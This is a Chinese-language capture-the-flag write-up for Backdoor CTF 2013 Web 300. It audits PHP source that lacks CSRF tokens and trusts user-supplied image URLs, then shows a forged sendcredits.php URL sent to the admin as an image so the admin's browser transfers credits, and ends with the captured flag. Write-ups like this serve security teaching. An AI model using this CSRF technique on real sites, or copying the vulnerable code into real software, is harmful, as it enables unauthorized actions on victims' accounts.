Backdoor CTF 2013 Web 300

backdoor ctf 2013, ctf, web, 代码审计

0x00 题目

H4x0r的网站系统需要积分,为你账号获得积分从而获取flag,你可以审计一波网站系统源代码
提示:管理员有一堆积分,就看你能不能用了。

0x01 解题

下载源代码,页面不是很多,简单从主页顺着理了一下网站功能实现,初始注册登陆之后积分为0,注意到:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
if(@$_SESSION['flash'])
{
  echo $_SESSION['flash'];
  unset($_SESSION['flash']);
}
else
{
  echo "Welcome to Miracle. You have ".$_SESSION['credits']." credits";
}
if($_SESSION['credits']>0)
  echo "<br> Congrats, the flag is ".$flag;
?>

只要帐户积分大于0就可以得到flag,而网站有为其他帐户送积分和发送图片链接的功能:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
//sendcredits.php
<?php
require('secure.php');
$username=$db->escape_string($_GET['username']);
$credits=(int)$db->escape_string($_GET['credits']);
//Credits has to be a positive integer
if(!is_integer($credits) || $credits<0)
{
	header("Location: error.php?error=ic");
	exit;
}
if($credis>10)
{
	//You can't transfer more than 10 credits.
	header("Location: error.php?error=tc");
	exit;
}
if($_SESSION['credits']>$credits)
{
	//Transfer credits
	$db->query("UPDATE users SET credits=credits+$credits WHERE username='$username'");
	$result=$db->query("UPDATE users SET credits=credits-$credits WHERE username='{$_SESSION['username']}'");
}
else
{
	//Not enough credits
	header("Location: error.php?error=nc");
	exit;
}
if($result)
{
	$_SESSION['flash']="Credits Sent Successfully";
	header("Location: index.php");
}
else
	header("Location: error.php?error=im");

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//sendimage.php
<?php
require('secure.php');
$username=$db->escape_string($_POST['username']);
$url=strip_tags($db->escape_string($_POST['img_url']));
if (filter_var($url, FILTER_VALIDATE_URL) === FALSE) {
    header('Location: error.php?error=wa');
}
else{
	$result=$db->query("INSERT INTO images VALUES ('$username','$url')");
	if($result)
	{
		$_SESSION['flash']="Image Sent Successfully";
		header("Location: index.php");
	}
	else
		header("Location: error.php?error=im");
}

个人登陆主页后显示别的用户发送的图片链接:

1
2
3
4
5
6
7
8
9
10
//login_form.html
<div class="span12">
  <h2>Images sent to you </h2>
  <?php
  while($row=$images->fetch_assoc())
  {
	echo "<img src='{$row['url']}'><br>";
  }
  ?>
</div>

根据提示,再从代码可以看出,用户操作积分时没有taken且对别人传来url完全信任,没有做任何检测,所以这题代码审计主要考查CSRF,只要我们精心构造一个url,类似:

1
http://backdoor-problems.cognizance.org.in/web300/sendcredits.php?credits=1&username=OUR_USERNAME

OUR_USERNAME为自己帐户名,通过发送图片链接功能发送给admin,当管理员登陆主页后,浏览器会主动访问发送过来的”链接”,从而执行我们的payload,那么我们帐户便会增加积分。

结果:

1
2
Welcome to Miracle. You have 1 credits
Congrats, the flag is d50ccf35a71566b5269d9a6896547a28